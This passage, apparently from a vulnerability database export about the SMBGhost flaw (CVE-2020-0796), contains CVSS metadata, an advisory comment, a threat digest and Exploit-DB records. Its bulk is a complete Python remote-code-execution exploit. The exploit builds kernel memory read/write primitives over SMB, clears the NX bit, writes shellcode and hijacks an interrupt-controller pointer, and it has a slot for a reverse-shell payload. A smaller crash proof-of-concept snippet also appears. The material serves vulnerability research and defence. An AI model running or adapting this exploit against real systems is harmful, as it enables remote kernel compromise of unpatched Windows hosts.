appears to allow any authenticated user on a Windows system to modify the configuration settings for OpenSSH, which would allow for configuring it in such a way that could allow for a privilege escalation for an inbound user via SSH. OTOH, if you are already authenticated, you could just log in yourself and perform an LPE much the same way as SMBGhost was used for LPE (CVE-2020-0796).\n\nAssessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-1292 OpenSSH for Windows Elevation of Privilege Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1292"], "modified": "2020-07-24T00:00:00", "id": "AKB:27DB2819-5039-4831-815A-798764488B88", "href": "https://attackerkb.com/topics/lHvv23pCqC/cve-2020-1292-openssh-for-windows-elevation-of-privilege-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-04-22T21:53:10", "description": "A remote code execution vulnerability exists 
in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T16:15:00", "type": "cve", "title": "CVE-2020-0796", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-04-22T19:02:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1909"], "id": "CVE-2020-0796", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0796", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-16T06:07:24", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-30T00:00:00", "type": "exploitdb", "title": "Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-0796", "CVE-2020-0796"], "modified": "2020-03-30T00:00:00", "id": "EDB-ID:48267", "href": "https://www.exploit-db.com/exploits/48267", "sourceData": "# CVE-2020-0796\r\n\r\nWindows SMBv3 LPE Exploit\r\n\r\n\r\n\r\n## Authors\r\n\r\n * Daniel Garc\u00eda Guti\u00e9rrez ([@danigargu](https://twitter.com/danigargu))\r\n * Manuel Blanco Paraj\u00f3n ([@dialluvioso_](https://twitter.com/dialluvioso_))\r\n\r\n## References\r\n\r\n* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796\r\n* https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html\r\n* https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server.html#.Xndfn0lv150.twitter\r\n* https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/\r\n* http://blogs.360.cn/post/CVE-2020-0796.html\r\n* 
https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/\r\n\r\n\r\nDownload ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48267.zip", "sourceHref": "https://www.exploit-db.com/download/48267", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:07:29", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-14T00:00:00", "type": "exploitdb", "title": "Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-0796", "CVE-2020-0796"], "modified": "2020-03-14T00:00:00", "id": "EDB-ID:48216", "href": "https://www.exploit-db.com/exploits/48216", "sourceData": "# CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost\r\n\r\nDownload ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip\r\n\r\n## Usage\r\n\r\n`./CVE-2020-0796.py servername`\r\n\r\nThis script connects to the target host, and compresses the authentication request with a bad offset 
field set in the transformation header, causing the decompressor to buffer overflow and crash the target.\r\n\r\nThis contains a modification of the excellent [smbprotocol](https://github.com/jborean93/smbprotocol) with added support for SMB 3.1.1 compression/decompression (only LZNT1). Most of the additions are in `smbprotocol/connection.py`. A version of [lznt1](https://github.com/you0708/lznt1) is included, modified to support Python 3.\r\n\r\nThe compression transform header is in the `SMB2CompressionTransformHeader` class there. The function `_compress` is called to compress tree requests. This is where the offset field is set all high to trigger the crash.\r\n\r\n```python\r\n    def _compress(self, b_data, session):\r\n        header = SMB2CompressionTransformHeader()\r\n        header['original_size'] = len(b_data)\r\n        header['offset'] = 4294967295\r\n        header['data'] = smbprotocol.lznt1.compress(b_data)\r\n```\r\n\r\n## About\r\n\r\nCVE-2020-0796 is a bug in Windows 10 1903/1909's new SMB3 compression capability. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression capabilities, and to selectively compress SMB3 messages as beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include a `SMB2_COMPRESSION_CAPABILITIES` as documented in [MS-SMB2 2.2.3.1.3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271).\r\n\r\nOnce a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages. To do so, the entire SMB packet is compressed, and a transformed header is prepended, as documented in [MS-SMB2 2.2.42](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0). 
This header is a small (16-byte) structure with a magic value, the uncompressed data size, the compression algorithm used, and an offset value.\r\n\r\nCVE-2020-0796 is caused by a lack of bounds checking in that offset size, which is directly passed to several subroutines. Passing a large value in will cause a buffer overflow, and crash the kernel. With further work, this could be developed into an RCE exploit.", "sourceHref": "https://www.exploit-db.com/download/48216", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:06:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-02T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - 'SMBGhost' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-0796", "CVE-2020-0796"], "modified": "2020-06-02T00:00:00", "id": "EDB-ID:48537", "href": "https://www.exploit-db.com/exploits/48537", "sourceData": "#!/usr/bin/env python\r\n'''\r\n# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48537.zip\r\n\r\n# 
SMBGhost_RCE_PoC\r\n\r\nRCE PoC for CVE-2020-0796 \"SMBGhost\"\r\n\r\nFor demonstration purposes only! Only use this as a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die. \r\n\r\nNow that that's out of the way....\r\n\r\nUsage ex: \r\n\r\n``` \r\n$SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131\r\n[+] found low stub at phys addr 13000!\r\n[+] PML4 at 1ad000\r\n[+] base of HAL heap at fffff79480000000\r\n[+] ntoskrnl entry at fffff80645792010\r\n[+] found PML4 self-ref entry 1eb\r\n[+] found HalpInterruptController at fffff79480001478\r\n[+] found HalpApicRequestInterrupt at fffff80645cb3bb0\r\n[+] built shellcode!\r\n[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000\r\n[+] KUSER_SHARED_DATA PTE NX bit cleared!\r\n[+] Wrote shellcode at fffff78000000a00!\r\n[+] Press a key to execute shellcode!\r\n[+] overwrote HalpInterruptController pointer, should have execution shortly...\r\n```\r\n\r\nReplace payload in USER_PAYLOAD in exploit.py. Max of 600 bytes. If you want more, modify the kernel shell code yourself. \r\n\r\nlznt1 code from [here](https://github.com/you0708/lznt1). 
Modified to add a \"bad compression\" function to corrupt SRVNET buffer\r\nheader without causing a crash.\r\n\r\nSee this excellent write up by Ricera Security for more details on the methods I used: \r\nhttps://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html\r\n'''\r\n\r\nimport sys\r\nimport socket\r\nimport struct\r\nimport argparse\r\n\r\nfrom lznt1 import compress, compress_evil\r\nfrom smb_win import smb_negotiate, smb_compress\r\n\r\n# Use lowstub jmp bytes to signature search\r\nLOWSTUB_JMP = 0x1000600E9\r\n# Offset of PML4 pointer in lowstub\r\nPML4_LOWSTUB_OFFSET = 0xA0\r\n# Offset of lowstub virtual address in lowstub\r\nSELFVA_LOWSTUB_OFFSET = 0x78\r\n# Offset of NTOSKRNL entry address in lowstub\r\nNTENTRY_LOWSTUB_OFFSET = 0x278\r\n\r\n# Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptController\r\nHALP_APIC_REQ_INTERRUPT_OFFSET = 0x78\r\n\r\nKUSER_SHARED_DATA = 0xFFFFF78000000000\r\n\r\n# Offset of pNetRawBuffer in SRVNET_BUFFER_HDR\r\nPNET_RAW_BUFF_OFFSET = 0x18\r\n# Offset of pMDL1 in SRVNET_BUFFER_HDR\r\nPMDL1_OFFSET = 0x38\r\n\r\n# Shellcode from kernel_shellcode.asm (raw bytes omitted)\r\n\r\nKERNEL_SHELLCODE = b\"\"\r\n\r\n# Reverse shell generated by msfvenom (raw bytes omitted). Can you believe I had to download Kali Linux for this shit?\r\n\r\nUSER_PAYLOAD = b\"\"\r\n\r\n\r\nPML4_SELFREF = 0\r\nPHAL_HEAP = 0\r\nPHALP_INTERRUPT = 0\r\nPHALP_APIC_INTERRUPT = 0\r\nPNT_ENTRY = 0\r\n\r\nmax_read_retry = 3\r\noverflow_val = 0x1100\r\nwrite_unit = 0xd0\r\npmdl_va = KUSER_SHARED_DATA + 0x900\r\npmdl_mapva = KUSER_SHARED_DATA + 0x800\r\npshellcodeva = KUSER_SHARED_DATA + 0xa00\r\n\r\n\r\nclass MDL:\r\n def __init__(self, map_va, phys_addr):\r\n self.next = struct.pack(\"<Q\", 0x0)\r\n self.size = struct.pack(\"<H\", 0x40)\r\n self.mdl_flags = struct.pack(\"<H\", 0x5004)\r\n self.alloc_processor = struct.pack(\"<H\", 0x0)\r\n self.reserved = struct.pack(\"<H\", 0x0)\r\n self.process = struct.pack(\"<Q\", 0x0)\r\n self.map_va = struct.pack(\"<Q\", map_va)\r\n map_va &= 
~0xFFF\r\n self.start_va = struct.pack(\"<Q\", map_va)\r\n self.byte_count = struct.pack(\"<L\", 0x1100)\r\n self.byte_offset = struct.pack(\"<L\", (phys_addr & 0xFFF) + 0x4)\r\n phys_addr_enc = (phys_addr & 0xFFFFFFFFFFFFF000) >> 12\r\n self.phys_addr1 = struct.pack(\"<Q\", phys_addr_enc)\r\n self.phys_addr2 = struct.pack(\"<Q\", phys_addr_enc)\r\n self.phys_addr3 = struct.pack(\"<Q\", phys_addr_enc)\r\n\r\n def raw_bytes(self):\r\n mdl_bytes = self.next + self.size + self.mdl_flags + \\\r\n self.alloc_processor + self.reserved + self.process + \\\r\n self.map_va + self.start_va + self.byte_count + \\\r\n self.byte_offset + self.phys_addr1 + self.phys_addr2 + \\\r\n self.phys_addr3\r\n return mdl_bytes\r\n\r\n\r\ndef reconnect(ip, port):\r\n sock = socket.socket(socket.AF_INET)\r\n sock.settimeout(7)\r\n sock.connect((ip, port))\r\n return sock\r\n\r\n\r\ndef write_primitive(ip, port, data, addr):\r\n sock = reconnect(ip, port)\r\n smb_negotiate(sock)\r\n sock.recv(1000)\r\n uncompressed_data = b\"\\x41\"*(overflow_val - len(data))\r\n uncompressed_data += b\"\\x00\"*PNET_RAW_BUFF_OFFSET\r\n uncompressed_data += struct.pack('<Q', addr)\r\n compressed_data = compress(uncompressed_data)\r\n smb_compress(sock, compressed_data, 0xFFFFFFFF, data)\r\n sock.close()\r\n\r\n\r\ndef write_srvnet_buffer_hdr(ip, port, data, offset):\r\n sock = reconnect(ip, port)\r\n smb_negotiate(sock)\r\n sock.recv(1000)\r\n compressed_data = compress_evil(data)\r\n dummy_data = b\"\\x33\"*(overflow_val + offset)\r\n smb_compress(sock, compressed_data, 0xFFFFEFFF, dummy_data)\r\n sock.close()\r\n\r\n\r\ndef read_physmem_primitive(ip, port, phys_addr):\r\n i = 0\r\n while i < max_read_retry:\r\n i += 1\r\n buff = try_read_physmem_primitive(ip, port, phys_addr)\r\n if buff is not None:\r\n return buff\r\n\r\n\r\ndef try_read_physmem_primitive(ip, port, phys_addr):\r\n fake_mdl = MDL(pmdl_mapva, phys_addr).raw_bytes()\r\n write_primitive(ip, port, fake_mdl, pmdl_va)\r\n 
write_srvnet_buffer_hdr(ip, port, struct.pack('<Q', pmdl_va), PMDL1_OFFSET)\r\n\r\n i = 0\r\n while i < max_read_retry:\r\n i += 1\r\n sock = reconnect(ip, port)\r\n smb_negotiate(sock)\r\n buff = sock.recv(1000)\r\n sock.close()\r\n if buff[4:8] != b\"\\xfeSMB\":\r\n return buff\r\n\r\n\r\ndef get_phys_addr(ip, port, va_addr):\r\n pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1)))\r\n pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1)))\r\n pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1)))\r\n pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1)))\r\n\r\n pml4e = PML4 + pml4_index*0x8\r\n pdpt_buff = read_physmem_primitive(ip, port, pml4e)\r\n\r\n if pdpt_buff is None:\r\n sys.exit(\"[-] physical read primitive failed\")\r\n\r\n pdpt = struct.unpack(\"<Q\", pdpt_buff[0:8])[0] & 0xFFFFF000\r\n pdpte = pdpt + pdpt_index*0x8\r\n pdt_buff = read_physmem_primitive(ip, port, pdpte)\r\n\r\n if pdt_buff is None:\r\n sys.exit(\"[-] physical read primitive failed\")\r\n\r\n pdt = struct.unpack(\"<Q\", pdt_buff[0:8])[0] & 0xFFFFF000\r\n pdte = pdt + pdt_index*0x8\r\n pt_buff = read_physmem_primitive(ip, port, pdte)\r\n\r\n if pt_buff is None:\r\n sys.exit(\"[-] physical read primitive failed\")\r\n\r\n pt = struct.unpack(\"<Q\", pt_buff[0:8])[0]\r\n \r\n if pt & (1 << (8 - 1)):\r\n phys_addr = (pt & 0xFFFFF000) + (pt_index & 0xFFF)*0x1000 + (va_addr & 0xFFF)\r\n return phys_addr\r\n else:\r\n pt = pt & 0xFFFFF000\r\n\r\n pte = pt + pt_index*0x8\r\n pte_buff = read_physmem_primitive(ip, port, pte)\r\n\r\n if pte_buff is None:\r\n sys.exit(\"[-] physical read primitive failed\")\r\n\r\n phys_addr = (struct.unpack(\"<Q\", pte_buff[0:8])[0] & 0xFFFFF000) + \\\r\n (va_addr & 0xFFF)\r\n\r\n return phys_addr\r\n\r\n\r\ndef get_pte_va(addr):\r\n pt = addr >> 9\r\n lb = (0xFFFF << 48) | (PML4_SELFREF << 39)\r\n ub = ((0xFFFF << 48) | (PML4_SELFREF << 39) +\r\n 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8\r\n pt = pt | lb\r\n pt = pt & ub\r\n\r\n return pt\r\n\r\n\r\ndef 
overwrite_pte(ip, port, addr):\r\n phys_addr = get_phys_addr(ip, port, addr)\r\n\r\n buff = read_physmem_primitive(ip, port, phys_addr)\r\n\r\n if buff is None:\r\n sys.exit(\"[-] read primitive failed!\")\r\n\r\n pte_val = struct.unpack(\"<Q\", buff[0:8])[0]\r\n\r\n # Clear NX bit\r\n overwrite_val = pte_val & (((1 << 63) - 1))\r\n overwrite_buff = struct.pack(\"<Q\", overwrite_val)\r\n\r\n write_primitive(ip, port, overwrite_buff, addr)\r\n\r\n\r\ndef build_shellcode():\r\n global KERNEL_SHELLCODE\r\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PHALP_INTERRUPT +\r\n HALP_APIC_REQ_INTERRUPT_OFFSET)\r\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PHALP_APIC_INTERRUPT)\r\n KERNEL_SHELLCODE += struct.pack(\"<Q\", PNT_ENTRY & 0xFFFFFFFFFFFFF000)\r\n KERNEL_SHELLCODE += USER_PAYLOAD\r\n\r\n\r\ndef search_hal_heap(ip, port):\r\n global PHALP_INTERRUPT\r\n global PHALP_APIC_INTERRUPT\r\n search_len = 0x10000\r\n\r\n index = PHAL_HEAP\r\n page_index = PHAL_HEAP\r\n cons = 0\r\n phys_addr = 0\r\n\r\n while index < PHAL_HEAP + search_len:\r\n\r\n # It seems that pages in the HAL heap are not necessarily contiguous in physical memory, \r\n # so we try to reduce number of reads like this \r\n \r\n if not (index & 0xFFF):\r\n phys_addr = get_phys_addr(ip, port, index)\r\n else:\r\n phys_addr = (phys_addr & 0xFFFFFFFFFFFFF000) + (index & 0xFFF)\r\n\r\n buff = read_physmem_primitive(ip, port, phys_addr)\r\n\r\n if buff is None:\r\n sys.exit(\"[-] physical read primitive failed!\")\r\n\r\n entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1)\r\n i = 0\r\n \r\n # This heuristic seems to be OK to find HalpInterruptController, but could use improvement\r\n while i < entry_indices:\r\n entry = struct.unpack(\"<Q\", buff[i:i+8])[0]\r\n i += 8\r\n if (entry & 0xFFFFFF0000000000) != 0xFFFFF80000000000:\r\n cons = 0\r\n continue\r\n cons += 1\r\n if cons > 3:\r\n PHALP_INTERRUPT = index + i - 0x40\r\n print(\"[+] found HalpInterruptController at %lx\"\r\n % PHALP_INTERRUPT)\r\n\r\n if len(buff) < 
i + 0x40:\r\n buff = read_physmem_primitive(ip, port, index + i + 0x38)\r\n PHALP_APIC_INTERRUPT = struct.unpack(\"<Q\", buff[0:8])[0]\r\n \r\n if buff is None:\r\n sys.exit(\"[-] physical read primitive failed!\")\r\n else:\r\n PHALP_APIC_INTERRUPT = struct.unpack(\"<Q\",buff[i + 0x38:i+0x40])[0]\r\n \r\n print(\"[+] found HalpApicRequestInterrupt at %lx\" % PHALP_APIC_INTERRUPT)\r\n \r\n return\r\n index += entry_indices\r\n\r\n sys.exit(\"[-] failed to find HalpInterruptController!\")\r\n\r\n\r\ndef search_selfref(ip, port):\r\n search_len = 0x1000\r\n index = PML4\r\n\r\n while search_len:\r\n buff = read_physmem_primitive(ip, port, index)\r\n if buff is None:\r\n return\r\n entry_indices = 8*(((len(buff) + 8 // 2) // 8) - 1)\r\n i = 0\r\n while i < entry_indices:\r\n entry = struct.unpack(\"<Q\",buff[i:i+8])[0] & 0xFFFFF000\r\n if entry == PML4:\r\n return index + i\r\n i += 8\r\n search_len -= entry_indices\r\n index += entry_indices\r\n\r\n\r\ndef find_pml4_selfref(ip, port):\r\n global PML4_SELFREF\r\n self_ref = search_selfref(ip, port)\r\n\r\n if self_ref is None:\r\n sys.exit(\"[-] failed to find PML4 self reference entry!\")\r\n\r\n PML4_SELFREF = (self_ref & 0xFFF) >> 3\r\n\r\n print(\"[+] found PML4 self-ref entry %0x\" % PML4_SELFREF)\r\n\r\n\r\ndef find_low_stub(ip, port):\r\n global PML4\r\n global PHAL_HEAP\r\n global PNT_ENTRY\r\n\r\n limit = 0x100000\r\n index = 0x1000\r\n\r\n while index < limit:\r\n buff = read_physmem_primitive(ip, port, index)\r\n\r\n if buff is None:\r\n sys.exit(\"[-] physical read primitive failed!\")\r\n\r\n entry = struct.unpack(\"<Q\", buff[0:8])[0] & 0xFFFFFFFFFFFF00FF\r\n\r\n if entry == LOWSTUB_JMP:\r\n print(\"[+] found low stub at phys addr %lx!\" % index)\r\n PML4 = struct.unpack(\"<Q\", buff[PML4_LOWSTUB_OFFSET: PML4_LOWSTUB_OFFSET + 8])[0]\r\n print(\"[+] PML4 at %lx\" % PML4)\r\n PHAL_HEAP = struct.unpack(\"<Q\", buff[SELFVA_LOWSTUB_OFFSET:SELFVA_LOWSTUB_OFFSET + 8])[0] & 0xFFFFFFFFF0000000\r\n print(\"[+] 
base of HAL heap at %lx\" % PHAL_HEAP)\r\n\r\n buff = read_physmem_primitive(ip, port, index + NTENTRY_LOWSTUB_OFFSET)\r\n\r\n if buff is None:\r\n sys.exit(\"[-] physical read primitive failed!\")\r\n\r\n PNT_ENTRY = struct.unpack(\"<Q\", buff[0:8])[0]\r\n print(\"[+] ntoskrnl entry at %lx\" % PNT_ENTRY)\r\n return\r\n\r\n index += 0x1000\r\n\r\n sys.exit(\"[-] Failed to find low stub in physical memory!\")\r\n\r\n\r\ndef do_rce(ip, port):\r\n find_low_stub(ip, port)\r\n find_pml4_selfref(ip, port)\r\n search_hal_heap(ip, port)\r\n \r\n build_shellcode()\r\n\r\n print(\"[+] built shellcode!\")\r\n\r\n pKernelUserSharedPTE = get_pte_va(KUSER_SHARED_DATA)\r\n print(\"[+] KUSER_SHARED_DATA PTE at %lx\" % pKernelUserSharedPTE)\r\n\r\n overwrite_pte(ip, port, pKernelUserSharedPTE)\r\n print(\"[+] KUSER_SHARED_DATA PTE NX bit cleared!\")\r\n \r\n # TODO: figure out why we can't write the entire shellcode data at once. There is a check before srv2!Srv2DecompressData preventing the call of the function.\r\n to_write = len(KERNEL_SHELLCODE)\r\n write_bytes = 0\r\n while write_bytes < to_write:\r\n write_sz = min([write_unit, to_write - write_bytes])\r\n write_primitive(ip, port, KERNEL_SHELLCODE[write_bytes:write_bytes + write_sz], pshellcodeva + write_bytes)\r\n write_bytes += write_sz\r\n \r\n print(\"[+] Wrote shellcode at %lx!\" % pshellcodeva)\r\n\r\n input(\"[+] Press a key to execute shellcode!\")\r\n \r\n write_primitive(ip, port, struct.pack(\"<Q\", pshellcodeva), PHALP_INTERRUPT + HALP_APIC_REQ_INTERRUPT_OFFSET)\r\n print(\"[+] overwrote HalpInterruptController pointer, should have execution shortly...\")\r\n \r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"-ip\", help=\"IP address of target\", required=True)\r\n parser.add_argument(\"-p\", \"--port\", default=445, help=\"SMB port, \\\r\n default: 445\", required=False, type=int)\r\n args = parser.parse_args()\r\n\r\n do_rce(args.ip, args.port)", 
"sourceHref": "https://www.exploit-db.com/download/48537", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2022-08-17T04:36:00", "description": "Published Vulnerabilities: 563; Interesting Vulnerabilities: 14; Active Threat Groups: 3; Targeted Countries: 69; Targeted Industries: 08; ATT&CK TTPs: 71. For a detailed threat digest, download the pdf file here. Summary: The second week of August 2022 witnessed the discovery of 563 vulnerabilities, of which 14 gained the attention of threat actors and security researchers worldwide. Among these 14, 2 are zero-days, and 10 are awaiting analysis on the National Vulnerability Database (NVD). Hive Pro Threat Research Team has curated a list of 14 CVEs that require immediate action. This week also saw Cuba Ransomware exploiting CVE-2020-1472 and CVE-2021-1732, and another vulnerability, CVE-2020-0796, was seen exploited by BlueSky Ransomware. Further, we also observed 3 threat actor groups being highly active in the last week. UNC2447, an unknown threat actor group known for financial crime and gain; Lapsus$, a Brazilian threat actor group known for data theft and destruction; and the Yanluowang ransomware gang, a Chinese threat actor group known for financial crime and gain, were observed stealing around 2.8 GB of data from Cisco. 
Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-16T05:00:49", "type": "hivepro", "title": "Vulnerabilities & Threats that Matter 08 \u2013 14th Aug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1472", "CVE-2021-1732"], "modified": 